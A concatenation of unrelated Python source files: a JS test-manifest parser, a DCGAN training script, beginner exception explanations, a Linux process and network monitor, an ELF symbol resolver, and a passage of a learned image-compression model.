while True:
path, tail = os.path.split(path)
if not tail:
break
dirs.append(path)
return dirs
class XULInfo:
def __init__(self, abi, os, isdebug):
self.abi = abi
self.os = os
self.isdebug = isdebug
self.browserIsRemote = False
def as_js(self):
"""Return JS that when executed sets up variables so that JS expression
predicates on XUL build info evaluate properly."""
return ('var xulRuntime = { OS: "%s", XPCOMABI: "%s", shell: true };' +
'var isDebugBuild=%s; var Android=%s; var browserIsRemote=%s') % (
self.os,
self.abi,
str(self.isdebug).lower(),
str(self.os == "Android").lower(),
str(self.browserIsRemote).lower())
@classmethod
def create(cls, jsdir):
"""Create a XULInfo based on the current platform's characteristics."""
# Our strategy is to find the autoconf.mk generated for the build and
# read the values from there.
# Find config/autoconf.mk.
dirs = split_path_into_dirs(os.getcwd()) + split_path_into_dirs(jsdir)
path = None
for dir in dirs:
_path = os.path.join(dir, 'config/autoconf.mk')
if os.path.isfile(_path):
path = _path
break
if path == None:
print "Can't find config/autoconf.mk on a directory containing the JS shell (searched from %s)"%jsdir
sys.exit(1)
# Read the values.
val_re = re.compile(r'(TARGET_XPCOM_ABI|OS_TARGET|MOZ_DEBUG)\s*=\s*(.*)')
kw = {}
for line in open(path):
m = val_re.match(line)
if m:
key, val = m.groups()
val = val.rstrip()
if key == 'TARGET_XPCOM_ABI':
kw['abi'] = val
if key == 'OS_TARGET':
kw['os'] = val
if key == 'MOZ_DEBUG':
kw['isdebug'] = (val == '1')
return cls(**kw)
class XULInfoTester:
def __init__(self, xulinfo, js_bin):
self.js_prolog = xulinfo.as_js()
self.js_bin = js_bin
# Maps JS expr to evaluation result.
self.cache = {}
def test(self, cond):
"""Test a XUL predicate condition against this local info."""
ans = self.cache.get(cond, None)
if ans is None:
cmd = [ self.js_bin, '-e', self.js_prolog, '-e', 'print(!!(%s))'%cond ]
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
if out in ('true\n', 'true\r\n'):
ans = True
elif out in ('false\n', 'false\r\n'):
ans = False
else:
raise Exception(("Failed to test XUL condition %r;"
+ " output was %r, stderr was %r")
% (cond, out, err))
self.cache[cond] = ans
return ans
class NullXULInfoTester:
"""Can be used to parse manifests without a JS shell."""
def test(self, cond):
return False
def parse(filename, xul_tester, reldir = ''):
ans = []
comment_re = re.compile(r'#.*')
dir = os.path.dirname(filename)
try:
f = open(filename)
except IOError:
print "warning: include file not found: '%s'"%filename
return ans
for line in f:
sline = comment_re.sub('', line)
parts = sline.split()
if len(parts) == 0:
# line is empty or just a comment, skip
pass
elif parts[0] == 'include':
include_file = parts[1]
include_reldir = os.path.join(reldir, os.path.dirname(include_file))
ans += parse(os.path.join(dir, include_file), xul_tester, include_reldir)
elif parts[0] == 'url-prefix':
# Doesn't apply to shell tests
pass
else:
script = None
enable = True
expect = True
random = False
slow = False
debugMode = False
pos = 0
while pos < len(parts):
if parts[pos] == 'fails':
expect = False
pos += 1
elif parts[pos] == 'skip':
expect = enable = False
pos += 1
elif parts[pos] == 'random':
random = True
pos += 1
elif parts[pos].startswith('fails-if'):
cond = parts[pos][len('fails-if('):-1]
if xul_tester.test(cond):
expect = False
pos += 1
elif parts[pos].startswith('asserts-if'):
# This directive means we may flunk some number of
# NS_ASSERTIONs in the browser. For the shell, ignore it.
pos += 1
elif parts[pos].startswith('skip-if'):
cond = parts[pos][len('skip-if('):-1]
if xul_tester.test(cond):
expect = enable = False
pos += 1
elif parts[pos].startswith('random-if'):
cond = parts[pos][len('random-if('):-1]
if xul_tester.test(cond):
random = True
pos += 1
elif parts[pos].startswith('require-or'):
cond = parts[pos][len('require-or('):-1]
(preconditions, fallback_action) = re.split(",", cond)
for precondition in re.split("&&", preconditions):
if precondition == 'debugMode':
debugMode = True
elif precondition == 'true':
pass
else:
if fallback_action == "skip":
expect = enable = False
elif fallback_action == "fail":
expect = False
elif fallback_action == "random":
random = True
else:
raise Exception("Invalid precondition '%s' or fallback action '%s'" % (precondition, fallback_action))
break
pos += 1
elif parts[pos] == 'script':
script = parts[pos+1]
pos += 2
elif parts[pos] == 'slow':
slow = True
pos += 1
elif parts[pos] == 'silentfail':
# silentfails use tons of memory, and Darwin doesn't support ulimit.
if xul_tester.test("xulRuntime.OS == 'Darwin'"):
expect = enable = False
pos += 1
else:
print 'warning: invalid manifest line element "%s"'%parts[pos]
pos += 1
assert script is not None
ans.append(TestCase(os.path.join(reldir, script),
enable, expect, random, slow, debugMode))
return ans
|
# -*- coding: utf-8 -*-
"""
@author: Prabhu <<EMAIL>>
"""
import os
import torch
import torch.nn as nn
import torchvision.transforms as transform
from torch import optim
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import torchvision.datasets as dset
import torchvision.utils as vutils
import numpy as np
from src.generator import Gen
from src.discriminator import Disc
import matplotlib.animation as annime
from IPython.display import HTML, display
import pickle
import argparse
def get_args():
parser = argparse.ArgumentParser("""Train DCGAN for creating fake images""")
parser.add_argument('-e', "--num_epochs", type=int, default= 10)
args = parser.parse_args()
return args
torch.manual_seed(546)
image_size = 64 # using image size as 64x64 with 3 channel i.e 3x64x64
# path = 'results/performance.txt'
dataset = dset.ImageFolder(root = 'data/celeba', transform = transform.Compose([transform.Resize(image_size),
transform.CenterCrop(image_size),
transform.ToTensor(),
transform.Normalize((0.5,0.5,0.5),
(0.5,0.5,0.5))]))
datasetLoader = DataLoader(dataset=dataset, batch_size=1024, shuffle=True)
device = torch.device("cuda:0" if torch.cuda.is_available() else 'cpu')
sample = iter(datasetLoader).__next__()
# print(vutils.make_grid(sample[0].to(device)[:64], padding= 2, normalize= True).cpu().size())
# print(sample)
plt.figure(figsize=(8,8))
plt.axis('off')
plt.title("Train set images")
plt.imshow(np.transpose(vutils.make_grid(sample[0].to(device)[:64], padding= 2, normalize= True).cpu(),(1,2,0)))
plt.savefig('fig/sample_image.png')
plt.close()
# initialize weights for Generator and Discriminator networks
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') !=-1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
m.bias.data.fill_(0)
def plot_fig(Gen_losses, Dis_losses):
plt.figure(figsize=(10,8))
plt.title("Generator and Discrimator loss while training")
plt.plot(Gen_losses, label='G_loss')
plt.plot(Dis_losses, label = 'D_loss')
plt.xlabel("Iterations")
plt.ylabel("Loss")
plt.legend()
plt.savefig('fig/Loss_ns.png')
return plt.draw()
def train(save_performance, opt, weights_init):
model_G = Gen(num_GenFeatureMaps = 64, num_OutputChannels = 3, vector_size = 100).to(device)
model_D = Disc(num_Channels = 3, num_DisFeaturesMaps = 64, vector_size = 100).to(device)
model_G.apply(weights_init)
model_D.apply(weights_init)
criterion = nn.BCELoss()
fixed_noise = torch.randn(64, 100, 1,1, device=device)
real_imgLable = 1
fake_imgLabel = 0
optimizerD = optim.Adam(model_D.parameters(), lr= 0.0001, betas=(0.5, 0.999))
optimizerG = optim.Adam(model_G.parameters(), lr= 0.001, betas=(0.5, 0.999))
img_list = []
G_loss = []
D_loss = []
iters = 0
for epoch in range(opt.num_epochs):
for i, data in enumerate(datasetLoader):
"""
Stage 1: The Discriminator network will be trained on real data and also on fake data, which is generated by
Generator network. After evaluation of all gradients w.r.t real and fake data, the Discriminator model will be
optimized.
"""
model_D.zero_grad()
# Stage 1.1 : training from a real input
real_data = data[0].to(device)
realSize = real_data.shape[0]
labels = torch.full((realSize,), real_imgLable, device= device) # torch.Size([128])
# print(labels)
real_predictions= model_D(real_data) # torch.Size([128, 1, 1, 1])
real_predictions.view(-1) # torch.Size([128])
real_errD = criterion(real_predictions, labels)
real_errD.backward()
D_x = real_predictions.mean().item()
# Stage 1.2 : training from a fake input
# 100 means latent vector size, which is the same input value for Generator model
noise = torch.randn(realSize, 100, 1,1, device= device)
fake_data= model_G(noise)
labels.fill_(fake_imgLabel)
# print(labels)
fake_predictions=model_D(fake_data.detach()) #torch.Size([128, 1, 1, 1])
fake_predictions.view(-1) #torch.Size([128])
fake_errD = criterion(fake_predictions, labels)
fake_errD.backward()
D_G_z1 = fake_predictions.mean().item()
errD = real_errD + fake_errD
optimizerD.step()
"""
stage 2 : which is for updating Generator network after Discriminator network error evaluation D(G(z))
i.e maximization of log(D(G(z))) in order to increase more realistic images from Generator. The more
Discriminator network confuses to identify between real and fake then the more error will yield.
"""
model_G.zero_grad()
labels.fill_(real_imgLable)
# print('********')
# print(fake_data.size())
predictionsG = model_D(fake_data)
predictionsG.view(-1)
# print(predictionsG.view(-1))
errG = criterion(predictionsG, labels)
errG.backward()
D_G_z2 = errG.mean().item()
optimizerG.step()
print("Iter:[{}/{}]\tEpoch:[{}/{}]\tLossD:{}\tLossG:{}\tD(X):{}\tD(G(z)):{}/{}".format(i+1,len(datasetLoader), epoch+1,opt.num_epochs, errD.item(), errG.item(),D_x, D_G_z1, D_G_z2))
if (i+1) % len(datasetLoader) == 0:
with open(save_performance, 'a') as f:
f.write("Iter:[{}/{}]\tEpoch:[{}/{}]\tLossD:{}\tLossG:{}\tD(X):{}\tD(G(z)):{}/{}\n".format(i+1,len(datasetLoader), epoch+1,opt.num_epochs, errD.item(), errG.item(),D_x, D_G_z1, D_G_z2))
G_loss.append(errG.item())
D_loss.append(errD.item())
# print fake images with a frequency of 500 iterations of update to Generator network weights
if (iters% 500 ==0) or ((epoch+1) == opt.num_epochs) or ((i+1)==len(datasetLoader)):
with torch.no_grad():
fake_image = model_G(fixed_noise).detach().cpu()
img_list.append(vutils.make_grid(fake_image, padding=2,normalize=True))
iters += 1
torch.save(model_G, 'models/generator_model_ns')
torch.save(model_D, 'models/discriminator_model_ns')
plot_fig(Gen_losses=G_loss, Dis_losses=D_loss)
losses ={}
losses['G_loss']=G_loss
losses['D_loss']=D_loss
with open('results/losses_ns.pkl','wb') as f:
pickle.dump(losses, f)
return img_list
if __name__ == '__main__':
opt= get_args()
img_list = train(save_performance='results/performance.txt', opt=opt, weights_init=weights_init)
modelG = torch.load('models/generator_model_ns')
fixed_noise = torch.randn(64, 100, 1,1, device=device)
fake_image = modelG(fixed_noise).detach().cpu()
i = vutils.make_grid(fake_image, padding=2, normalize=True)
plt.imshow(np.transpose(i, (1, 2, 0)), animated=True)
plt.savefig('fig/fake_images_ns.png')
# visualize the fake images
fig = plt.figure(figsize=(8,8))
plt.axis("off")
img = [[plt.imshow(np.transpose(i, (1,2,0)),animated= True)] for i in img_list]
animation_ = annime.ArtistAnimation(fig, img, interval= 1000, repeat_delay= 1000, blit=True)
print(display(HTML(animation_.to_jshtml()).data))
print(animation_.to_html5_video(embed_limit=None))
print('**********************************')
animation_.save(filename='results/anime_movie_ns')
# with open('results/fake_images.pkl', 'wb') as f:
# pickle.dump(img_list, file=f)
|
<reponame>MrGreenTea/friendly
"""info_generic.py
Generic information about Python exceptions.
"""
from .my_gettext import current_lang, no_information
GENERIC = {}
def get_generic_explanation(exception_name):
"""Provides a generic explanation about a particular exception."""
if exception_name in GENERIC:
return GENERIC[exception_name]()
elif exception_name.endswith("Warning"):
return GENERIC["UnknownWarning"]()
else:
return no_information()
def register(error_name):
"""Decorator used to record as available an explanation for a given exception"""
def add_exception(function):
GENERIC[error_name] = function
def wrapper():
return function()
return wrapper
return add_exception
@register("ArithmeticError")
def arithmetic_error():
_ = current_lang.translate
return _(
"`ArithmeticError` is the base class for those built-in exceptions\n"
"that are raised for various arithmetic errors.\n"
"It is unusual that you are seeing this exception;\n"
"normally, a more specific exception should have been raised.\n"
)
@register("AttributeError")
def attribute_error():
_ = current_lang.translate
return _(
"An `AttributeError` occurs when the code contains something like\n"
" `object.x`\n"
"and `x` is not a method or attribute (variable) belonging to `object`.\n"
)
@register("EOFError")
def eof_error():
_ = current_lang.translate
return _(
"An `EOFError` is raised when the `input()` function hits\n"
"an end-of-file condition (EOF) without reading any data.\n"
)
@register("FileNotFoundError")
def file_not_found_error():
_ = current_lang.translate
return _(
"A `FileNotFoundError` exception indicates that you\n"
"are trying to open a file that cannot be found by Python.\n"
"This could be because you misspelled the name of the file.\n"
)
@register("ImportError")
def import_error():
_ = current_lang.translate
return _(
"An `ImportError` exception indicates that a certain object could not\n"
"be imported from a module or package. Most often, this is\n"
"because the name of the object is not spelled correctly.\n"
)
@register("IndentationError")
def indentation_error():
_ = current_lang.translate
return _(
"An `IndentationError` occurs when a given line of code is\n"
"not indented (aligned vertically with other lines) as expected.\n"
)
@register("IndexError")
def index_error():
_ = current_lang.translate
return _(
"An `IndexError` occurs when you try to get an item from a list,\n"
"a tuple, or a similar object (sequence), and use an index which\n"
"does not exist; typically, this happens because the index you give\n"
"is greater than the length of the sequence.\n"
)
@register("KeyError")
def key_error():
_ = current_lang.translate
return _(
"A `KeyError` is raised when a value is not found as a\n"
"key in a Python dict.\n"
)
@register("LookupError")
def lookup_error():
_ = current_lang.translate
return _(
"`LookupError` is the base class for the exceptions that are raised\n"
"when a key or index used on a mapping or sequence is invalid.\n"
"It can also be raised directly by codecs.lookup().\n"
)
@register("ModuleNotFoundError")
def module_not_found_error():
_ = current_lang.translate
return _(
"A `ModuleNotFoundError` exception indicates that you\n"
"are trying to import a module that cannot be found by Python.\n"
"This could be because you misspelled the name of the module\n"
"or because it is not installed on your computer.\n"
)
@register("NameError")
def name_error():
_ = current_lang.translate
return _(
"A `NameError` exception indicates that a variable or\n"
"function name is not known to Python.\n"
"Most often, this is because there is a spelling mistake.\n"
"However, sometimes it is because the name is used\n"
"before being defined or given a value.\n"
)
@register("OverflowError")
def overflow_error():
_ = current_lang.translate
return _(
"An `OverflowError` is raised when the result of an arithmetic operation\n"
"is too large to be handled by the computer's processor.\n"
)
@register("RecursionError")
def recursion_error():
_ = current_lang.translate
return _(
"A `RecursionError` is raised when a function calls itself,\n"
"directly or indirectly, too many times.\n"
"It almost always indicates that you made an error in your code\n"
"and that your program would never stop.\n"
)
@register("SyntaxError")
def syntax_error():
_ = current_lang.translate
return _("A `SyntaxError` occurs when Python cannot understand your code.\n")
@register("TabError")
def tab_error():
_ = current_lang.translate
return _(
"A `TabError` indicates that you have used both spaces\n"
"and tab characters to indent your code.\n"
"This is not allowed in Python.\n"
"Indenting your code means to have block of codes aligned vertically\n"
"by inserting either spaces or tab characters at the beginning of lines.\n"
"Python's recommendation is to always use spaces to indent your code.\n"
)
@register("TypeError")
def type_error():
_ = current_lang.translate
return _(
"A `TypeError` is usually caused by trying\n"
"to combine two incompatible types of objects,\n"
"by calling a function with the wrong type of object,\n"
"or by trying to do an operation not allowed on a given type of object.\n"
)
@register("ValueError")
def value_error():
_ = current_lang.translate
return _(
"A `ValueError` indicates that a function or an operation\n"
"received an argument of the right type, but an inappropriate value.\n"
)
@register("UnboundLocalError")
def unbound_local_error():
_ = current_lang.translate
return _(
"In Python, variables that are used inside a function are known as \n"
"local variables. Before they are used, they must be assigned a value.\n"
"A variable that is used before it is assigned a value is assumed to\n"
"be defined outside that function; it is known as a `global`\n"
"(or sometimes `nonlocal`) variable. You cannot assign a value to such\n"
"a global variable inside a function without first indicating to\n"
"Python that this is a global variable, otherwise you will see\n"
"an `UnboundLocalError`.\n"
)
@register("UnknownWarning")
def unknown_warning():
_ = current_lang.translate
return _("No information is available about this warning.\n")
@register("ZeroDivisionError")
def zero_division_error():
_ = current_lang.translate
return _(
"A `ZeroDivisionError` occurs when you are attempting to divide a value\n"
"by zero either directly or by using some other mathematical operation.\n"
)
|
<gh_stars>1-10
#!/usr/bin/env python
# encoding: utf-8
'''
monitor.collector -- shortdesc
monitor.collector is a description
It defines classes_and_methods
@author: Yi
@copyright: 2016 MY. All rights reserved.
'''
from subprocess import Popen
from subprocess import PIPE
import logging, time, re, copy
# logging.basicConfig(level=logging.DEBUG)
class Ps:
WHO = 'linux_ps'
WHO_NET = 'linux_net'
WHO_CMD = 'linux_cmd'
def __init__(self, syslog):
logging.info("linux file process monitor starting ...")
logging.info("linux netstat monitor starting ...")
logging.info("linux command monitor starting ...")
self.__w_infos = {}
self.__ps_cur = {}
self.__ps_new = {}
self.__net_cur = {}
self.syslog = syslog
def start(self, config):
while 1:
try:
self.__do_process(config.ps_excludes)
self.__do_netstat(config.net_includes)
time.sleep(config.delay)
except Exception, e:
logging.error("linux process monitor error: " + str(e.args))
def __do_process(self, ps_excludes):
ptn = re.compile("\s+")
p1 = Popen(["ps", "-efc"], stdout=PIPE)
p2 = Popen(["w", "-h"], stdout=PIPE)
output = p2.communicate()[0];del p2
itmes = output.strip().split("\n")
for item in itmes:
if item:
infos = ptn.split(item)
self.__w_infos[infos[0]+"-"+infos[1]] = infos[2]
output = p1.communicate()[0];del p1
processes = output.strip().split("\n")
del_arr = []
add_arr = []
self.__ps_new = {}
for process in processes[1:]:
if process:
infos = ptn.split(process)
if infos[8] in ("w", "ps", "[w]", "[ps]", "/usr/bin/python", "python", "[python]"):
continue
if infos[8] in ps_excludes:
continue
ps_flag = False
for ps_exclude in ps_excludes:
if infos[8].find(ps_exclude) != -1:
ps_flag = True
break
if ps_flag:
continue
self.__ps_new[infos[1]] = infos
if len(self.__ps_cur) != 0:
for c_key in self.__ps_cur:
if not self.__ps_new.has_key(c_key):
del_arr.append(self.__ps_cur[c_key])
for n_key in self.__ps_new:
if not self.__ps_cur.has_key(n_key):
add_arr.append(self.__ps_new[n_key])
logging.debug("current processes count: %d" % len(self.__ps_cur))
logging.debug("new processes count: %d" % len(self.__ps_new))
self.__ps_cur = copy.copy(self.__ps_new)
for add in add_arr:
if self.__w_infos.has_key(add[6]):
ip = self.__w_infos.has_key(add[6])
else:
ip = '127.0.0.1'
access_time = time.time()
file_path = add[8]
pid = add[1]
process_name = add[8]
ppid = add[2]
if self.__ps_cur.has_key(ppid):
ppname = self.__ps_cur[ppid][8]
else:
ppname = ''
exec_user = original_user = add[0]
log = "start %s %s %s %s %s %s %s %s" % (access_time, file_path, pid, process_name, ppid, ppname, exec_user, original_user)
self.syslog.send(Ps.WHO, log)
for d in del_arr:
if self.__w_infos.has_key(d[6]):
ip = self.__w_infos.has_key(d[6])
else:
ip = '127.0.0.1'
access_time = time.time()
file_path = d[8]
pid = d[1]
process_name = d[8]
ppid = d[2]
if self.__ps_cur.has_key(ppid):
ppname = self.__ps_cur[ppid][8]
else:
ppname = ''
exec_user = original_user = d[0]
log = "stop %s %s %s %s %s %s %s %s" % (access_time, file_path, pid, process_name, ppid, ppname, exec_user, original_user)
self.syslog.send(Ps.WHO, log)
for add in add_arr:
if add[6].find("pts") == -1:
continue
if self.__w_infos.has_key(add[6]):
ip = self.__w_infos.has_key(add[6])
else:
ip = '127.0.0.1'
access_time = time.time()
file_path = add[8]
pid = add[1]
process_name = add[8]
if len(add) > 9:
process_name = process_name + "\t" + add[9]
ppid = add[2]
if self.__ps_cur.has_key(ppid):
ppname = self.__ps_cur[ppid][8]
else:
ppname = ''
exec_user = original_user = add[0]
log = "%s %s %s %s %s %s" % (access_time, process_name, "", exec_user, original_user, ip)
self.syslog.send(Ps.WHO_CMD, log)
def __do_netstat(self, includes):
ptn = re.compile("\s+")
p1 = Popen(["netstat", "-anp"], stdout=PIPE)
output = p1.communicate()[0];del p1
processes = output.strip().split("\n")
add_arr = []
net_new = {}
for process in processes[2:]:
if process:
if process.find("Active UNIX domain soc") != -1:
break
infos = ptn.split(process)
net_new[infos[3] + "-" + infos[4]] = infos
if len(self.__net_cur) != 0:
for n_key in net_new:
if not self.__net_cur.has_key(n_key):
add_arr.append(net_new[n_key])
logging.debug("current networks count: %d" % len(self.__net_cur))
logging.debug("new networks count: %d" % len(net_new))
self.__net_cur = copy.copy(net_new)
for add in add_arr:
if len(add) < 8:
add.insert(5, "")
access_time = time.time()
ip = add[3][:add[3].rfind(":")]
port = add[3][add[3].rfind(":")+1:]
pn = add[6].split("/")
if len(pn) == 2:
pid = pn[0]
pname = pn[1]
else:
pid = ""
pname = ""
if port in includes.strip().split(","):
network_status = 1
else:
network_status = 2
log = "%s %s %s %s %s %s %s %s" % (access_time, add[3], add[4], add[5], add[0], pid, pname, network_status)
self.syslog.send(Ps.WHO_NET, log)
def main():
try:
ps = Ps(1)
ps.start(10)
except Exception, e:
logging.error("linux process monitor stop: " + str(e.args))
logging.error("linux command monitor stop: " + str(e.args))
logging.error("linux networks monitor stop: " + str(e.args))
if __name__ == '__main__':
main()
|
<filename>pmu-tools-master/parser/elf.py<gh_stars>0
#!/usr/bin/env python
# resolve ELF and DWARF symbol tables using elftools
#
# Copyright (c) 2013-2014, Intel Corporation
# Author: <NAME>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
from elftools.common.py3compat import maxint, bytes2str
from elftools.elf.elffile import ELFFile
from elftools.elf.sections import SymbolTableSection
import elftools.common.exceptions
import util
import kernel
# global caches
open_files = dict()
resolved = dict()
symtables = dict()
lines = dict()
def build_line_table(dwarfinfo):
lines = []
for CU in dwarfinfo.iter_CUs():
lp = dwarfinfo.line_program_for_CU(CU)
prevstate = None
for entry in lp.get_entries():
if entry.state is None or entry.state.end_sequence:
continue
if prevstate:
lines.append((prevstate.address,
entry.state.address,
lp['file_entry'][prevstate.file - 1].name,
prevstate.line))
prevstate = entry.state
lines.sort()
return lines
def build_symtab(elffile):
syms = []
for section in elffile.iter_sections():
if isinstance(section, SymbolTableSection):
for nsym, sym in enumerate(section.iter_symbols()):
name = bytes2str(sym.name)
if not name:
continue
if sym.entry.st_info.type != 'STT_FUNC':
continue
end = sym['st_value'] + sym['st_size']
syms.append((sym['st_value'], end,
bytes2str(sym.name)))
syms.sort()
return syms
reported = set()
def find_elf_file(fn):
if fn.startswith("//"):
return None
if fn in open_files:
elffile = open_files[fn]
else:
try:
f = open(fn, 'rb')
elffile = ELFFile(f)
open_files[fn] = elffile
except (IOError, elftools.common.exceptions.ELFError):
if fn not in reported:
print "Cannot open", fn
reported.add(fn)
return None
return elffile
def resolve_line(fn, ip):
elffile = find_elf_file(fn)
if elffile is None:
return "?"
if fn not in lines and elffile.has_dwarf_info():
lines[fn] = build_line_table(elffile.get_dwarf_info())
src = None
if resolve_line and fn in lines:
pos = util.find_le(lines[fn], ip)
if pos:
src = "%s:%d" % (pos[2], pos[3])
return src
# global one hit cache
# helps a lot for LBR decoding
# tbd use a small list with LRU?
last_sym = None
def resolve_sym(fn, ip):
elffile = find_elf_file(fn)
if elffile is None:
return "?", 0
global last_sym
try:
if fn not in symtables:
symtables[fn] = build_symtab(elffile)
if last_sym and last_sym[0] <= ip <= last_sym[1]:
return last_sym[2], ip - last_sym[0]
loc = None
offset = None
if fn in symtables:
sym = util.find_le(symtables[fn], ip)
if sym:
loc, offset = sym[2], ip - sym[0]
except elftools.common.exceptions.ELFError:
return "?", 0
return loc, offset
def resolve_ip(filename, foffset, ip, need_line):
sym, soffset, line = None, 0, None
if filename and filename.startswith("/"):
sym, soffset = resolve_sym(filename, foffset)
if not sym:
sym, soffset = resolve_sym(filename, ip)
if need_line:
line = resolve_line(filename, ip)
else:
sym, soffset = kernel.resolve_kernel(ip)
return sym, soffset, line
if __name__ == '__main__':
import sys
print resolve_addr(sys.argv[1], int(sys.argv[2], 16))
print resolve_line(sys.argv[1], int(sys.argv[2], 16))
|
<filename>src/model.py
"""
Stitches submodels together.
"""
import numpy as np
import time, os
import itertools
from functools import partial
from collections import defaultdict, namedtuple
import torch
import torch.nn as nn
import torch.nn.functional as F
# Custom modules
from src import hyperprior
from src.loss import losses
from src.helpers import maths, datasets, utils
from src.network import encoder, generator, discriminator, hyper
from src.loss.perceptual_similarity import perceptual_loss as ps
from default_config import ModelModes, ModelTypes, hific_args, directories
Intermediates = namedtuple("Intermediates",
["input_image", # [0, 1] (after scaling from [0, 255])
"reconstruction", # [0, 1]
"latents_quantized", # Latents post-quantization.
"n_bpp", # Differential entropy estimate.
"q_bpp"]) # Shannon entropy estimate.
Disc_out= namedtuple("disc_out",
["D_real", "D_gen", "D_real_logits", "D_gen_logits"])
class Model(nn.Module):
def __init__(self, args, logger, storage_train=defaultdict(list), storage_test=defaultdict(list), model_mode=ModelModes.TRAINING,
model_type=ModelTypes.COMPRESSION):
super(Model, self).__init__()
"""
Builds hific model from submodels in network.
"""
self.args = args
self.model_mode = model_mode
self.model_type = model_type
self.logger = logger
self.log_interval = args.log_interval
self.storage_train = storage_train
self.storage_test = storage_test
self.step_counter = 0
if self.args.use_latent_mixture_model is True:
self.args.latent_channels = self.args.latent_channels_DLMM
if not hasattr(ModelTypes, self.model_type.upper()):
raise ValueError("Invalid model_type: [{}]".format(self.model_type))
if not hasattr(ModelModes, self.model_mode.upper()):
raise ValueError("Invalid model_mode: [{}]".format(self.model_mode))
self.image_dims = self.args.image_dims # Assign from dataloader
self.batch_size = self.args.batch_size
self.entropy_code = False
if model_mode == ModelModes.EVALUATION:
self.entropy_code = True
self.Encoder = encoder.Encoder(self.image_dims, self.batch_size, C=self.args.latent_channels,
channel_norm=self.args.use_channel_norm)
self.Generator = generator.Generator(self.image_dims, self.batch_size, C=self.args.latent_channels,
n_residual_blocks=self.args.n_residual_blocks, channel_norm=self.args.use_channel_norm, sample_noise=
self.args.sample_noise, noise_dim=self.args.noise_dim)
if self.args.use_latent_mixture_model is True:
self.Hyperprior = hyperprior.HyperpriorDLMM(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, mixture_components=self.args.mixture_components, entropy_code=self.entropy_code)
else:
self.Hyperprior = hyperprior.Hyperprior(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, entropy_code=self.entropy_code)
self.amortization_models = [self.Encoder, self.Generator]
self.amortization_models.extend(self.Hyperprior.amortization_models)
# Use discriminator if GAN mode enabled and in training/validation
self.use_discriminator = (
self.model_type == ModelTypes.COMPRESSION_GAN
and (self.model_mode != ModelModes.EVALUATION)
)
if self.use_discriminator is True:
assert self.args.discriminator_steps > 0, 'Must specify nonzero training steps for D!'
self.discriminator_steps = self.args.discriminator_steps
self.logger.info('GAN mode enabled. Training discriminator for {} steps.'.format(
self.discriminator_steps))
self.Discriminator = discriminator.Discriminator(image_dims=self.image_dims,
context_dims=self.args.latent_dims, C=self.args.latent_channels)
self.gan_loss = partial(losses.gan_loss, args.gan_loss_type)
else:
self.discriminator_steps = 0
self.Discriminator = None
self.squared_difference = torch.nn.MSELoss(reduction='none')
# Expects [-1,1] images or [0,1] with normalize=True flag
self.perceptual_loss = ps.PerceptualLoss(model='net-lin', net='alex', use_gpu=torch.cuda.is_available(), gpu_ids=[args.gpu])
def store_loss(self, key, loss):
assert type(loss) == float, 'Call .item() on loss before storage'
if self.training is True:
storage = self.storage_train
else:
storage = self.storage_test
if self.writeout is True:
storage[key].append(loss)
def compression_forward(self, x):
"""
Forward pass through encoder, hyperprior, and decoder.
Inputs
x: Input image. Format (N,C,H,W), range [0,1],
or [-1,1] if args.normalize_image is True
torch.Tensor
Outputs
intermediates: NamedTuple of intermediate values
"""
image_dims = tuple(x.size()[1:]) # (C,H,W)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
hyperinfo = self.Hyperprior(y, spatial_shape=x.size()[2:])
latents_quantized = hyperinfo.decoded
total_nbpp = hyperinfo.total_nbpp
total_qbpp = hyperinfo.total_qbpp
# Use quantized latents as input to G
reconstruction = self.Generator(latents_quantized)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
reconstruction = reconstruction[:, :, :image_dims[1], :image_dims[2]]
intermediates = Intermediates(x, reconstruction, latents_quantized,
total_nbpp, total_qbpp)
return intermediates, hyperinfo
def discriminator_forward(self, intermediates, train_generator):
""" Train on gen/real batches simultaneously. """
x_gen = intermediates.reconstruction
x_real = intermediates.input_image
# Alternate between training discriminator and compression models
if train_generator is False:
x_gen = x_gen.detach()
D_in = torch.cat([x_real, x_gen], dim=0)
latents = intermediates.latents_quantized.detach()
latents = torch.repeat_interleave(latents, 2, dim=0)
D_out, D_out_logits = self.Discriminator(D_in, latents)
D_out = torch.squeeze(D_out)
D_out_logits = torch.squeeze(D_out_logits)
D_real, D_gen = torch.chunk(D_out, 2, dim=0)
D_real_logits, D_gen_logits = torch.chunk(D_out_logits, 2, dim=0)
return Disc_out(D_real, D_gen, D_real_logits, D_gen_logits)
def distortion_loss(self, x_gen, x_real):
# loss in [0,255] space but normalized by 255 to not be too big
# - Delegate scaling to weighting
sq_err = self.squared_difference(x_gen*255., x_real*255.) # / 255.
return torch.mean(sq_err)
def perceptual_loss_wrapper(self, x_gen, x_real, normalize=True):
""" Assumes inputs are in [0, 1] if normalize=True, else [-1, 1] """
LPIPS_loss = self.perceptual_loss.forward(x_gen, x_real, normalize=normalize)
return torch.mean(LPIPS_loss)
def compression_loss(self, intermediates, hyperinfo):
x_real = intermediates.input_image
x_gen = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
x_real = (x_real + 1.) / 2.
x_gen = (x_gen + 1.) / 2.
distortion_loss = self.distortion_loss(x_gen, x_real)
perceptual_loss = self.perceptual_loss_wrapper(x_gen, x_real, normalize=True)
